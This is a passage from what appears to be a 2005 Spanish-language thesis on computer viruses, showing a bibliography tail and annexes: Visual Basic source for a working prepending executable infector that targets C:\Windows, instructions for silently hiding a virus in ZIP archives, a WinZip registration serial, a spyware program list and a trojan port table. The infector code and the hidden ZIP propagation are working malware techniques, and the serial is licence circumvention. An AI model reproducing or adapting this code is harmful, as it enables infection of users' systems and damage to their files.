48. MORLANS HERNANDEZ, Karel. SCHAPACHNICK, Edgardo. BARRETO, José. Virus hoax. Obtenida en junio de 2005, de http://www.fac.org.ar/scvc/help/virus/viresp.htm#Virus%20Hoax 49. Morusa. Infección de Zip’s y Rar’s. Obtenida en Septiembre de 2005, de http://zod.com.mx/~gedzac/ezine/mitosis2.zip 50. Mouse. Virus para celulares también afecta a PCs. Obtenida en Septiembre de 2005, de http://www.mouse.cl/detail.asp?story=2005/09/23/17/58/17 51. MUÑOZ, Beatriz. Un nuevo virus informático ataca ya a los móviles en España. Obtenida en Septiembre de 2005, de http://www.internautas.org/html/3103.html 52. Noticiasdot. Los móviles de última generación no son seguros. Obtenida en Septiembre de 2005, de http://www.noticiasdot.com/publicaciones/2004/1004/0710/noticias071004/noticias 071004-1.htm 53. Noticiasdot. Teléfonos móviles: el nuevo blanco de los hackers. Obtenida en Septiembre de 2005, de http://www.aecomo.org/content.asp?contentid=2046&contenttypeid=2&catid=150& cattypeid=2 54. PACHECO, Federico G. diapositivas Spam y técnicas de filtrado. Obtenida en Junio de 2005, de www.lionix.com 55. Panda Software. Virus en dispositivos móviles. Obtenida en Septiembre de 2005, de http://www.sumovil.com/rep_36.asp 56. Panda Software. Virus en dispositivos móviles. Obtenida en Septiembre de 2005, de http://www.sumovil.com/rep_3602.asp 57. PÉREZ MORENO, Arnoldo. ¿Que son los honeypots?. Obtenida en Septiembre de 2005, de http://www.virusprot.com/Art33.html 58. PÉREZ MORENO, Arnoldo. Heurística antivirus. Obtenida en Septiembre de 2005, de http://alerta-antivirus.red.es/virus/ver_pag.html?tema=V&articulo=6&pagina=4 59. RODRÍGUEZ VALDEZ, José Luis. Sistemas operativos en el cinturón. Obtenida el 29 Septiembre de 2005, de http://www.enterate.unam.mx/Articulos/2005/abril/sistopera.htm

137

60. SAAVEDRA, Karina. Cuál es el futuro de los virus en este 2005. Obtenida en Septiembre de 2005, de http://microasist.com.mx/noticias/internet/ksoin110105.shtml 61. SOTO, Miguel Angel. El pasado, presente y futuro de los virus de computadora. Obtenida en Septiembre de 2005, de http://www.axtel.net/DesktopDefault.aspx?tabindex=3&tabid=19 62. Udec. Historia. Obtenida en Junio http://www2.udec.cl/~sscheel/pagina%20virus/historia.htm de 2005, de

63. Virusprot.com. Historia de los virus, capitulo I Los orígenes de los virus. Obtenida en junio de 2005, de http://www.virusprot.com/Historia1.html 64. Virusprot.com. Historia de los virus, capitulo II 1988, Empieza el baile. Obtenida en junio de 2005, de http://www.virusprot.com/Historia2.html 65. Virusprot.com. Historia de los virus, capitulo III 1989, El año de la avalancha. Obtenida en junio de 2005, de http://www.virusprot.com/Historia3.html 66. Virusprot.com. Historia de los virus, capitulo IV 1990, El tema se complica. Obtenida en junio de 2005, de http://www.virusprot.com/Historia4.html 67. Virusprot.com. Historia de los virus, capitulo V 1991, Lanzamiento de productos y polimorfismo. Obtenida en junio de 2005, de http://www.virusprot.com/Historia5.html 68. Virusprot.com. Historia de los virus, capitulo VI 1992, Un año muy complicado. Obtenida en junio de 2005, de http://www.virusprot.com/Historia6.html 69. Virusprot.com. Historia de los virus, capitulo VII 1993, Virus y máquinas polimórficas. Obtenida en junio de 2005, de http://www.virusprot.com/Historia7.html 70. VSantivirus No. 509 - Año 6. Troyanos en teléfonos móviles. Obtenida en Septiembre de 2005, de http://www.vsantivirus.com/29-11-01.htm#top 71. Wikipedia. Virus informático. Obtenida en Agosto de 2005, de es.wikipedia.org/wiki/Virus_inform%C3%A1tico

138

ANEXO A. INFECCION DE EJECUTABLES Infectar ejecutables por el método prepending, para lo cual el virus se le denominaría "HLLP", en la siguiente ilustración se puede entender mejor lo que es: [-------------] [-------------] Virus [-------------> Host [-------------] [-------------] Virus [----------------> [-------------] Host [-------------]

Un virus prepending mueve los bits y bytes del host hacia al final posicionando en primer lugar los bits y bytes suyos, de esta forma el virus toma el control de todo el host, ejecutandose primero. - La primera tarea es determinar el lugar donde se ubica nuestro virus: Private Function guorm() Dim lugar As String lugar = App.Path If Right(lugar, 1) = "\" Then guorm = lugar + App.EXEName + ".exe" Else guorm = lugar + "\" + App.EXEName + ".exe" End If End Function - Busqueda de archivos ejecutables Con la siguiente función que será llamada desde el código del virus, se llamara pasándole una carpeta, la cual devolverá una variable con todos los ejecutables separados por el siguiente signo:"|" (sin comillas): Private Function buscando(carpeta As String) As String Dim cr As String, cx As String cr = Dir$(carpeta + "*.exe") While cr <> "" cx = cx & cr & "|" cr = Dir$ Wend buscando = cx End Function

139

- Infectando ejecutables El siguiente paso será infectar los archivos que se hayan sacado con la función anterior, esta función se llamara de la siguiente forma: Call infectando Folder, archivo Donde Folder es la carpeta la cual anteriormente se elegio para extraer archivos, después se pone ahí el nombre del ejecutable. Sub infectando(carpeta As String, exedañino) On Error Resume Next If carpeta <> "" And exedañino <> "" Then Dim host As String Dim firma As String firma = "VIRUS" '<-------------------firma del virus Open carpeta + exedañino For Binary Access Read As #1 host = Space(LOF(1)) Get #1, , host Close #1 If InStr(host, firma) = 0 Then Dim virus As String Open guorm For Binary Access Read As #2 virus = Space(24576) '<----Tamaño en Bytes del virus, ver propiedades del ejecutable para sacarlo Get #2, , virus Close #2 Open carpeta + exedañino For Binary Access Write As #3 Put #3, , virus Put #3, , host Put #3, , firma Close #3 End If End If End Sub Como se puede ver se comprobará primero si las variables carpeta y exedañino contienen algo, seguidamente se establece en una variable la firma que identificará a la especie para no volver a infectar un mismo ejecutable, se procede a abrir el archivo en modo binario solo para leerlo, después se comprueba si este contiene la firma y si da 0 procederemos a abrir el ejecutable desde el cual estamos ubicados, para eso se llama a la función guorm, después se especificara el tamaño del virus el cual se leera, una vez que se tenga leído se procede a volver a abrir el archivo encontrado, el cual se le escribe primeramente

140

la variable que contiene el virus, seguido del host y la firma. la estructura del nuevo ejecutable deberá quedar de esta forma: [Virus] [ HOST] [FIRMA] - Regenerando el host Es de pensar por muchas personas que uniendo un ejecutable con otro, los dos se ejecutan, pero esto es falso, siempre el que esté de primero será ejecutado, el otro no, así que se tiene que buscar la forma de pasar el control al host para así no dar sospechas al usuario de que a ejecutado un virus (Este odigo es solo una introducción y aquí no se maneja API's para la identificación de las ventanas y así eliminar el archivo cuando es cerrado etc.) El siguiente Sub regenerará el archivo previamente infectado, ósea le pasa el control. Sub regenerando(ejecutable) Dim host2 As String Dim virs As String Open ejecutable For Binary Access Read As #1 virs = Space(24576) '<- tamaño en bytes del virus, para sacarlo compilar 'el ejecutable y ver en propiedades host2 = Space(LOF(1) - 24576) '<---se le resta el tamaño del virus a todo el host 'para que quede solo el ejecutable Get #1, , virs Get #1, , host2 Close #1 Dim xx, fso As Object Randomize xx = Int(Rnd * 100000) Set fso = CreateObject("Scripting.FileSystemObject") Open fso.GetSpecialFolder(2) & "\" & xx & ".exe" For Binary Access Write As #2 Put #2, , host2 Close #2 Dim aa aa = Shell(fso.GetSpecialFolder(2) & "\" & xx & ".exe") End Sub Lo primero que se hara será abrir el exe y leer el host, se randomiza un número aleatoria mente, se llama al objeto FSO para sacar el directorio TEMP, se crea ahí un archivo binario nuevo y se le escribe lo previamente leído, y por ultimo se ejecuta.

141

- instrucciones imprescindibles para el correcto funcionamiento del virus Las siguientes subs serán imprescindibles para el funcionamiento del virus, lo siguiente irá colocado en el sub form_load: Dim comp As String Open guorm For Binary Access Read As #1 comp = Space(LOF(1)) Get #1, , comp Close #1 If InStr(comp, "VIRUS") <> 0 Then regenerando (guorm) End if Se comprueba si se esta infectado, si es así llamamos al sub regenerando y se empieza el proceso ya explicado antes. Sin embargo esto no es todo : Dim xd, xa, carpeti As String carpeti = "C:\Windows\" '<-------- carpeta donde buscaremos los archivos para infectar xd = Split(buscando(carpeti), "|") For Each xa In xd infectando carpeti, xa Next Después de colocar el código anterior debajo se coloca este, el cual buscará en una carpeta especificada los archivos que se van a infectar, luego los coloca en una variable dimensional (Array) procediendo a realizar un for each para extraerlas y llamar al sub que infectará los exe's y eso es todo. - Algunos Términos: HLLO = Hight Level Lenguage OverWriting Virus que sobrescriben archivos para infectarlos HLLA = Hight Level Lenguage Appending Virus que infectan archivos pegándose al final del host HLLP = Hight Level Lenguage Prepending Virus que infectan archivos pegándose al principio del host (Falckon, 2005)24.

142

ANEXO B. INFECCION DE ZIP’s La pregunta es como infectar archivos zip's y pues el programa Winzip ayuda en ello. ¿Como? - Pues con los comandos que permiten zipear de manera que el usuario no se de cuenta. Winzip proporciona comandos llamados parámetros para crear zip`s, esto servirá para enviar el virus por mail zipeado, porque se envia el archivo adjunto de extensión "exe" el sevidor de mail lo retendrá porque son las extensiones más utilizadas por los virus en internet entre las cuales estan las ".com", ".pif", ".scr", ".vbs", etc…; puede, así que zipeando si se puede. - Primero que nada se debe de obtener la dirección de winzip: HKLM\Software\Microsoft\Windows\Currentversion\Uninstall\Winzip\UninstallString - El cual por ejemplo arrojará el siguiente valor al leer la cadena: "C:\ARCHIVOS DE PROGRAMA\WINZIP\WINZIP32.EXE" /uninstall - Como obtener la dirección: Winzip = fso.GetParentFolderName(Direcciondewinzip) - Algunos Comandos: - Agregar un Archivo a un zip: Shell Winzip & " -a " archivozip & " " & archivoexe Ejemplo: Shell Winzip & " -a C:\Hola.zip" & " C:\virus.exe" -Agregar varios archivos a un zip: Se puede agregar varios archivos de diferentes formas por extensíon y por nombre y dirección de los archivos. Ejemplo: Shell Winzip & " -a C:\Hola.zip" & " C:\windows\System\*.*" 'Ziperá todos los archivos que se encuentran en ese directorio Shell Winzip & " -a C:\Hola.zip" & " C:\windows\System\*.dll" 'Zipeará todos los archivos con extensión dll que esten en ese directorio Shell Winzip & " -a C:\Hola.zip" & " C:\virus.exe C:\Archivo.txt" 'Zipeará los archivos que fueron escritos no importando la dirección

143

-Extraer Archivos: La sintáxis para extraer archivos de un zip es la siguiente: Shell Winzip & " -e " & archivozip & " " & directorio Ejemplo: Shell Winzip & " -e C:\Hola.zip" & " C:\" - Como Crear un Archivo zip sin formato: Sólo Abre un archivo de modo binario y cierralo, es todo, nada mas que con extensión zip. Ejemplo: Open "C:\Archivozip.zip" for binary as #1 Close #1 - La infección: Simplemente buscar por algún método de búsqueda el que se quiera y al encontrarlo sólo adicionar el programa "Virus" con un nombre convincente para que el usuario lo abra y así se produzca la infección en otro sistema. Ejemplo: Si se encuentra el siguiente archivo --> "A:\Cosas.zip", Ahora se va infectar. Winzip = "C:\ARCHIVOS DE PROGRAMA\WINZIP\WINZIP32.EXE" midir = "C:\Windows\System32\virus.exe" Call infectar("A:\Cosas.zip") Sub infectar(Direccion as string) Shell Winzip " -a " & Direccion & " " & midir, VbHide 'Si se supone que winzip tiene el valor de la dirección y nombre del 'programa Winzip y midir tiene el valor de la dirección del exe junto con el ‘nombre y así ahora añadirlo. 'El VbHide sirve para ocultar el programa, así no se dará cuenta el 'usuario de que se está infectando un archivo de su diskette. Porque si 'no se pone caso de que tarde, se muestra el programa añadiendo un 'archivo. End sub

144

- Registro de Winzip: Otro problema que proporciona Winzip es que no esté registrado lo cual no es Complicado de registrar simplemente con las siguientes cadenas del regedit: "HKCU\software\nico mak computing\winzip\winini\Name" "HKCU\software\nico mak computing\winzip\winini\SN" "HKEY_USERS\.DEFAULT\software\nicomakcomputing\winzip\winini\Name" "HKEY_USERS\.DEFAULT\software\nico mak computing\winzip\winini\SN" Donde: Name = "Nombre del registrado" SN = "Numero de serie o Serial Number" En estos Valores de cadena "REG_SZ" se puede crear uno con un generador de numeros de serie que se puede encontrar en internet, Es igual el numero de serie para registrar Winzip en todas sus versiones. Ejemplo: Name = "NOMBRE" SN = "EBB9042E" Si se escribe en el registro las cadenas anteriores con los valores de arriba estará registrado winzip con el nombre de NOMBRE. Comprobado en versiones 8.x y 9.x) (Morusa, 2005)49. .

145

ANEXO C. PROGRAMAS CON SPYWARE Cydoor Abe's MP3 Finder AccessDiver Angove CD Player Ashampoo Uninstaller Audio CD MP3 Studio 2000 Babylon Blinkin Cash 2000 Challenge Pool CD Recording Studio CD Box Labaler Pro Connect Four Contact Plus Cowon Jet-Audio Crosses & Zeroes Disconnector Dope Wars EldoS Keeper eLOL(Electronic Laugh Out Loud) EasyFill 2.02 Easy Phone Book EzStock File Mentor FindShare FreeBase Free MP3 Free Pics Free Tetris GenoPro GetDown GodeZip Html Tutor pro Implosion screen saver In Vircible Anti Virus HumanClick iPhone Iper3 Lines98´/Lines Milenium Locker4U MatchBlox MoNooN3DR Monsters & Mayhem MP3 TagStudio Online Call Othello FX PC-to-Phone PostCryptum Photo Base Junior Picture Line Quickhead-E QMS Memory Squares QMS Mystery of Magical Numbers ReGet SeaWar Sign Language Teacher Spam Buster Speak Light Stats 99 SuperBot Task Plus The Dictator Toag ToasterMultiTester Virtual Friend Vocabulary Wizard YellowBase Zip Wrangler 3D Morris QuoTracker ReGet

EverAd CuteFTP Graph Paper Printer

146

Lines98 Mindjongg Mixman Studio PlayJ Studio Web3000 Afreet SiteViewer An Online Secretary AOL Anti-Timer Ariadne Browser Auction Station Beeline Bio-Rhythms Buddy Pad Calendar+ Calendar+ 2000 CD Extractor Email Extractor EpAssist EZSurfer 2000 eWork S File & MP3 Renamer GenoPro GPL Gimme IP HiClock JSoft Mail KFK KFTP DSSAgent Mattel Retail products Radiate Aaron's WebVacuum 0.8f Abe's FTP Client Abe's Image Viewer 1.1 Abe's MP3 Finder 4.0 Abe's Picture Finder 1.4 Abe's SMB Client Absolute Telnet 1.63 Access Diver III Ace of Humor 1.0 AceNotes Free 2000c Acorn Email 2.5

Shapez! Vocabulary Wizard 100% Word Search Free

Kmail Kmp3 Maxiimus Media Player My To Do Netcaptor NetMonitor NetSonic NotePad+ Password Manager PCDJ ShellGem SpyTech Time Manager TypeItIn Validate CC Web Resume Wizard WebSurfAce Web Word Wrestle 100 Proof Cocktail Planner !Glance 1st Contact

TimeWarner software MP3 Renamer 1.33 Mp3 Stream Recorder 2.3 MultiSender 1.03 Music Genie 1.0 MX Inspector BIG AD My Genie Sports Edition 2.5 My Genie Patriots My Genie SE My GetRight 1.0 NeatFTP 1.0 Net CB 1.0

147

ActionOutline Light 1.6 Active 'Net 1.0 AcqURL 3.1 Add/Remove Plus! 1.1 Add URL 1.0 Address Rover 98 Admiral VirusScanner 1.0 Advanced Call Center 2.9 Advanced Maillist Verify 1.6 Advanced internet Tool 2.2.2 Advertisement Wizard AdWizard Alchemy Anaconda Alive and Kicking 3.1 AllNetic WWW and FTP Observer AlphaScape QuickPaste AnchorNet1 Applet Game Mania 1.7 ASP1-A3 1.0 Auction Central 1.02 Auction Explorer AutoFTP PRO 2.3 AutoWeb 1.0 Aureate Group Mail 3.0 Aureate SpamKiller Free Edition AxelCD 2.1 AxMan Beatle bigEListener Binary Boy 1.70 BinaryVortex 1.4 BizAgent 1 Blue Engine 1.0 BookSmith : Original 1.2 BuddyPhone 2.0 Bullseye Searcher 2.5 Calypso E-mail 3.0 CamCollect 1.4c CamGrab Canasis vB vB-Beta Capture Express 2000 1.0 Car Lot Web Site Creator 1 Carlanthano 2.9.868

NewsShark Net-A-Car Feature Car Screensaver NetAnts NetBoard Netbus Pro 2.10 NetCaptor 5.0 Netman Downloader 1.0 NetMole 1.0 NetNak 4.2 Net Scan 2000 NetShark 1.0 NetSuck 3.10.5/3.1 NetTime Thingy 1.5 Net Vampire 3.3 NeuroStock NewsWire 1.5 Network Assistant 1.9 NetXtract NeuroStock NfoNak 4.1 NikNak 2.0.1 NotePads+ 2.0 Notificator 1.01b Octopus 3.0 OfTheDay Creator 1.0 OfTheDay Quizzer 1.1 OnlineCall 1.19 Option Insight 0.6.2 123Search 123Search 2 15 Puzzle 2.1 1 ClickWebSlideShow 20/20 5star Free Lines 1.2' 7way 0.15 Paint by numbers Pattern Book 1.0.02 PerfectPartner-Time&Billing (Demo)2.0 Personal internet Finder 1.7 Personal Search Agent .8 People Seek 98

148

Cascoly Screensaver 1.0 CD-AID 02.00.05.23 CDDB-Reader CDMaster32 3.0 Centarsia 1.01 ChanStat 3.3 Charity Banner 1.0 Cheat Machine 3.1 Check&Get 1 Check4New 1.7 ChinMail 1.2 Clabra clipboard viewer 1.2 Classic Peg Solitaire 1.0 ClipMate5-Student Edition Clock Saver 1.0 ComTry Music Downloader 2.2 Concentration Done Right 1 Connection Watcher 4 Crystal FTP 2000 CSE HTML Validator Lite CuteFTP 3.0/3.5 CuteFTP 3.0 beta CuteFTP/Tripod CutePage 2.0 CuteMX CutePage Danzig Pref Engine 1 1 DateTime 1.3 Desk Reference 0.1 Delphi Component Test Delphi Tester Dialarm 1.0.1.19 Dialer 2000 1.5 DigiBand NewsWatch Digi-Cam Web Page Generator DigiCams - The WebCam Viewer 1.0 Digital Postman 2.0 Direct Connect 0.9.963 DirectUpdate diskSpace explorer 2000 2.1 DL-Mail Pro 2000 Doorbell 1.18

PGNSetup Photocopier 2.0 PicPluck 2.0 Pictures In News 1.0 PingMaster Ping Thingy Pixel Pirate 1.0 Planet.Billboard Planet.MP3Find 3.0 PMS ponnu CHAMY's Music PopMon 1.0.0.1 Popup Dictionary 2.0.70 PowerPak Accounting and Inventory Management-Demo 2 PrePromote 1.0.0 PromaSoft Autoresponder 10.732 ProtectX 3.0 ProxyChecker Q*Wallet 1.6 QuadSucker/Web 1.8 Quadzle Puzzles QuikLink Autobot QuikLink Explorer QuikLink Explorer Freeware Edition 3.0 QuikLink Explorer Gold Edition 3.0 Quta Quote Ticker Bar 6.0 QuoteWatch 4.2 Quo Tracker 1.1.48 Real Estate Web Site Creator 1.0 ReallyEasy interactor 3.0(1) RealReverb Convolution 1.3 Recipe Review Rededit ReGet 1.6 Remoteshut Rename Master

149

DownloadAgent Download Minder 1.5/1.8 DownLoader 1.1 Download Wonder 1.55 dozeCrypt III DuRu 1 Dwyco Video Conferencing 2.3 eAssist EasySeeker 4.0 Easy Splitter 1 EIS Web Monitor 1.2 Email Extractor'99 2.92 Encoding Utility 2000 EnvoyMail EURO Converter 2 Everylink for You 2000 EVocabFlashCard 1.0 Executive Accounting-Demo Express Communicator 1 EZ-Forms FREE File&MP3 Renamer'99 File Mag-Net 3.0 FileSeeker FileSender FileSplit 2.2 Fire Client 1.5b1100 FlashGet (Formerly JetCar) 0.87 FloorplanLT Folder Guard Jr. 4.1 FormToolLT FourTimes 3.5 Frazzle FreeBudget Free Hearts for Windows 1 FreeImageEditor 1.0 FreeIRC 1.0 FreeNotePad 1.0 Free Picture Harvester FreeSaver MP3 1.0 FreeSite 1.0 Free Solitaire 3.0 Free Spades .7 FreeSubmit 1.0

Rest Your Eyes 3.0 Resume Detective 1.5 RingSurf RoboCam 1.10 Rosemary's Weird Web World Rosoft CD Extractor 1.09 Rosoft Media Player.1 SaberQuest Page Burner SaberQuest Tag Specification Edit Savings4u 1.0 Beta 3 SBJV 3.0 SBWcc 2.0 Scout's Game 1.0 scout's Game 1.02.1 ScreenFIRE 3.0 ScreenFIRE - FileKing ScreenFlavors Scripto .80 Sea Battle 1.0 SERanker 1.24 Shapez! 1.0 Shizzam 2.6 SimpleFind 1.0 Simple Submit 1.0 SiteBack SiteChecker Sitesniffer 1.0 Skeek Shooting 1.1 SK-111 SLEdit Slide Puzzle 1.00 SmartBoard 200 FREE Edition 2.6 Smart 'n Sticky SmartSum Calculator 2.0 Snap-It 4.0 Snipsnap 2.0 SoftCuisine 2 2.0 SonicBurn 1.3.178 SonicMail 2.6 Sound Agent 1 0 Space Checker

150

Free Submitter Pro FreeWebBrowser 1.0 FreeWebMail 1.0 FreeZip! 2.0 FTPEditor 1.7 Fundi e-Lert 1.4.1.29 GenoPro 1.71 GetRight 4.1 GetRight 4.2 c GetRight Mail Control 1.0 Gif Animator 1.00 GifLine Pro 2.0.2 GovernMail Go!Zilla 3.5 Go!Zilla WebAttack Gomoku Pro 1.1 GovernMmail 1.1 Grafula 1.2 Gunther's PasswordSentry HangWeb Hey.Beer.Man hesci Private Label Host Monitor 4 HTML Translator 2.5 HTTP Proxy-Spy Huey v1.8 Color Picker 1.8 HyperSnap-DX3.61 iAgent 1.0 Iban Technologies IP Tools 2000 3.1 Ice Fusion Idyle GimmIP 4/4.00 iFind Graphics 1.5 imageN ImagerX2000 3.0 Infinite Patience 2.2 InfoBlast InnovaClub In School We Trust (Pupil Edition) InstallZIP 1.4 iNetPad 3.1 Interchange FTP 0.2.1 InterFax 6.0.0 Internet Tree 2.0

Space Central Screen Saver Speaking Email Deluxe 5.5.0 Splash! Siterave Spherical HTML-Templator Spherical MP3INFO-Editor 1.0 StartDrive 1.0 Static FTP StationRadio StockBrowser 1.9 Subscriber SunEdit 2K SunEdit 2k Mod Manager SunKoSoft WebNewser 1.0b SuperIDE 1.4 Sweep 1.4 SweepsWinner Text Transmogrifier The Cassette Tape Producer 4.0.6 The Receptionist Desktop Edition 5 The Star Wars Combine HoloCom The Mapper TheNet 3.69 Tic-Tac-Toe Done right TIFNY 3.0 TI-FindMail 2.0 too Many Secrets 0.0.6 beta Total Finger 1.3 Total Whois 2.0 Tracking The Eye 1999 Trade Site Creator 1.1 Traffic Attractor 2000 4 Triangle Puzzle 1.00 Trivialnet 0.60 TUCOWS Uploader 2.11 twinExplorer 2.5 TWinExplorer Standard TypeWriter 1.0 3rd block 2.0 3d Anarchy 3D-FTP 3.0

151

Internetrix 1.0 InterWebWord Companion Invisible Secrets 2.0 IP-Turboscanner iToday Iwan's MP3 Finder 1.1 IYSoft Dial-Up Connection 1.2 JetCar JFK Research jIRC JOC Email Checker 1.7 JOC Web Finder JOC Web Spider 2.6 JPEG Optimizer 3.07 JrEdit 1 JOC Web Spider Kachat Messenger Keyword Monitor 1 KVT Diplom LapLink FTP 2.0 Laser Chess 1.0 LinkProver 2.0 LineSoft Download LOL Chat 2.5 Magellan explorer 2.2 Mail Them Manifest Timetrap 3.0 Marker 1.1 Meracl FontMap MASH-The Microsoft Agent Scripting Helper 4.5.3 MasterCrypt 2.0 Match It 1.0 Maxxchat 1.0 B-6 Meeting Planner 0.8.0.1 MegaSafe 6 MemriC 1.0 Meracl FontMap 1.2 Meracl Hexocol 1.1 Meracl ID3 Tag Writer Meracl ImageMap Generator 3.4 Meracl MD Recorder 1.0 MetaMan Midnight Oil Solitaire 3.1

3S Accounting 3SI Accounting&Inventory Management (Demo) 2.0 UdmSearch 3.0..11.2 UK Phone Codes Vagabond's Realm 0.9.1 VeriMP3 1.0 Veritape 1.3 Vertigo QSearch Virtual Access 5.0 Visual Surfer 1.4 VOG Backgammon Main 2 VOG Backgammon Table VOG Chess 2 VOG Chess Main VOG Chess Table Visual Cyberadio VOG Reversi Main VOG Reversi Table VOG Shell VOG Shell History W3Filer(32) Up/Downloader Internet Files 3.1.3 WarrenView 1.0 'WE' Group ProxyChecker 3.1.8 WebBug WebCamVCR 1.0 WebCam Wonder 1.0 WebCopier 1.3 Web Coupon 1.0 WebDrive 3.0 Web Database WebHunt 2.8 Webman 5.3 Web-N-Force 1.7 Web Page Authoring Software WebReaper 8.0 Web Registrant PRO 4.0 Web Resume 1.0 WebSaver Website Manager Web SurfACE 2.0 WebStripper 1.05 Web Word Search 1.0

152

MillenniuM BReaThe beta 0.3b MiniMemo-Die Cheatsdatenbank 9.0 MirNik Internet Finder 1.0 MonIRC 1.0.0.2 MoonWalker 2000 2.0.0 More Space 99 3.1 MouseAssist-awaiting final approval MP3 Album Finder 1.3 MP3 Cat 1.0 MP3 Fiend 5.5 MP3 Grouppie 4.5 MP3INFO-Editor MP3 Mag-Net 1.0 MP3 Player 2000 6.2

WebZip 3.5 WEB2SMS 1.0 WebType 1.0 WhoIs Thingy Win A Lotto WinEdit 2000 WinMP3Locator Word+ Wordwright 1.0 WorldChat Client Worm W3Filer www.devgames.com xBlock 1.2 Your ESP Test Zarko 1.9 Zarko3D Zip Express 2000 Zip Up The Web Pro! Zion 1.51

(Morgan, 2005)47.

153

ANEXO D. LISTADO DE PUERTOS POR LOS QUE SE COMUNICAN LOS TROYANOS Este es un listado de puertos por el cual se comunican los troyanos. Con el comando netstat -na se puede saber que puertos están abiertos en el momento de una conexión. Cabe aclarar que en estos programas se pueden modificar el puerto pero estos son con los que vienen por defecto en cada uno. port 1 (UDP) - Sockets des Troie port 2 Death port 20 Senna Spy FTP server port 21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash port 22 Shaft port 23 Fire HacKer, Tiny Telnet Server - TTS, Truva Atl port 25 Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy port 30 Agent 40421 port 31 Agent 31, Hackers Paradise, Masters Paradise port 41 DeepThroat, Foreplay port 48 DRAT port 50 DRAT port 58 DMSetup port 59 DMSetup port 79 CDK, Firehotcker port 80 711 trojan (Seven Eleven), AckCmd, Back End, BackOrifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader port 81 RemoConChubo port 99 Hidden Port, NCX port 110 ProMail trojan port 113 Invisible Identd Deamon, Kazimas port 119 Happy99 port 121 Attack Bot, God Message, JammerKillah port 123 Net Controller

154

port 133 Farnaz port 137 Chode port 137 (UDP) - Msinit port 138 Chode port 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz port 142 NetTaxi port 146 Infector port 146 (UDP) - Infector port 170 A-trojan port 334 Backage port 411 Backage port 420 Breach, Incognito port 421 TCP Wrappers trojan port 455 Fatal Connections port 456 Hackers Paradise port 513 Grlogin port 514 RPC Backdoor port 531 Net666, Rasmin port 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy port 605 Secret Service port 666 Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers) port 667 SniperNet port 669 DP trojan port 692 GayOL port 777 AimSpy, Undetected port 808 WinHole port 911 Dark Shadow port 999 Deep Throat, Foreplay, WinSatan port 1000 Der Späher / Der Spaeher, Direct Connection port 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx port 1010 Doly Trojan port 1011 Doly Trojan port 1012 Doly Trojan port 1015 Doly Trojan port 1016 Doly Trojan port 1020 Vampire port 1024 Jade, Latinus, NetSpy port 1025 Remote Storm port 1025 (UDP) - Remote Storm port 1035 Multidropper port 1042 BLA trojan port 1045 Rasmin port 1049 /sbin/initd

155

port 1050 MiniCommand port 1053 The Thief port 1054 AckCmd port 1080 WinHole port 1081 WinHole port 1082 WinHole port 1083 WinHole port 1090 Xtreme port 1095 Remote Administration Tool - RAT port 1097 Remote Administration Tool - RAT port 1098 Remote Administration Tool - RAT port 1099 Blood Fest Evolution, Remote Administration Tool - RAT port 1150 Orion port 1151 Orion port 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice port 1200 (UDP) - NoBackO port 1201 (UDP) - NoBackO port 1207 SoftWAR port 1208 Infector port 1212 Kaos port 1234 SubSevenJavaclient, Ultors Trojan port 1243 BackDoor-G, SubSeven, SubSevenApocalypse, Tiles port 1245 VooDoo Doll port 1255 Scarab port 1256 Project nEXT port 1269 Matrix port 1272 TheMatrix port 1313 NETrojan port 1338 Millenium Worm port 1349 Bo dll port 1394 GoFriller, Backdoor G-1 port 1441 Remote Storm port 1492 FTP99CMP port 1524 Trinoo port 1568 Remote Hack port 1600 Direct Connection, Shivka-Burka port 1703 Exploiter port 1777 Scarab port 1807 SpySender port 1966 Fake FTP port 1967 WM FTP Server port 1969 OpC BO port 1981 Bowl, Shockrave port 1999 Back Door, SubSeven, TransScout

156

port 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator port 2001 Der Späher / Der Spaeher, Trojan Cow port 2023 Ripper Pro port 2080 WinHole port 2115 Bugs port 2130 (UDP) - Mini Backlash port 2140 The Invasor port 2140 (UDP) - Deep Throat, Foreplay port 2155 Illusion Mailer port 2255 Nirvana port 2283 Hvl RAT port 2300 Xplorer port 2311 Studio 54 port 2330 Contact port 2331 Contact port 2332 Contact port 2333 Contact port 2334 Contact port 2335 Contact port 2336 Contact port 2337 Contact port 2338 Contact port 2339 Contact, Voice Spy port 2339 (UDP) - Voice Spy port 2345 Doly Trojan port 2565 Striker trojan port 2583 WinCrash port 2600 Digital RootBeer port 2716 The Prayer port 2773 Subseven, SubSeven2.1Gold port 2774 SubSeven, Sub Seven 2.1 gold port 2801 Phineas Phucker port 2989 (UDP) - Remote Administration Tool - RAT port 3000 Remote Shut port 3024 WinCrash port 3031 Microspy port 3128 Reverse WWW Tunnel Backdoor, RingZero port 3129 Masters Paradise port 3150 The Invasor port 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash port 3456 Terror trojan port 3459 Eclipse 2000, Sanctuary port 3700 Portal of Doom port 3777 PsychWard

157

